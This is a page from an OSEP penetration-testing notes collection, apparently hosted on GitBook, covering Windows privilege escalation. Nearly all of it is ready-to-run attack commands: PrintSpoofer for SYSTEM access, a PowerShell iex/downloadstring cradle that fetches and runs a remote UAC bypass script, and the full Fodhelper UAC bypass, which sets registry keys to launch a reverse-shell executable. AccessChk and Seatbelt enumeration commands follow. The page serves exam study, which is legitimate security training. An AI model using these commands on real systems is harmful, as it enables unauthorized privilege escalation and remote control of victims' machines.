OSEP Notes
  • Introduction
  • Useful Links, Tools & Tricks
  • OSEP
    • Metasploit Payload & Listener
      • Metasploit Useful Modules
      • Encoder
    • File Transfer & Execution
    • Phishing
    • Local Reconnaissance Windows
      • SQL Server Instance
      • Application Whitelisting & Credentials
    • Local Reconnaissance Linux
      • Ansible
    • Privilege Escalation
    • Pivoting
    • Pass the Hash
      • Remote Access
    • Post Exploitation
      • Add User
      • AMSI, CLM, & App Locker
    • Credentials
    • Lateral Movement
  • Active Directory
    • Domain Reconnaissance on Kali
    • Domain Reconnaissance on Windows
    • Active Directory Forest
Powered by GitBook
On this page
  1. OSEP

Privilege Escalation

PreviousAnsibleNextPivoting

Last updated 2 years ago

SeImpersonatePrivilege

PrintSpoofer64.exe -i -c powershell

Use the above command to get system privileges

UAC

iex(new-object net.webclient).downloadstring('http://192.168.1.1/uacbypass.ps1');alt
  • Fodhelper UAC Bypass

Use these commands in powershell session:

New-Item "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force

New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "Delega-
teExecute" -Value "" -Force

Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -
Value "powershell.exe -exec bypass -c C:\Windows\Tasks\reverse-shell.exe" -Force

Start a listener to catch the shell and now execute fodhelper.exe

C:\Windows\System32\fodhelper.exe

AccessChk

accesschk.exe "currentuser" C:\Windows -wus
accesschk.exe -ucqv servicename

SeatBelt

Seatbelt.exe -group=user
PrintSpoofer
UACBypass.ps1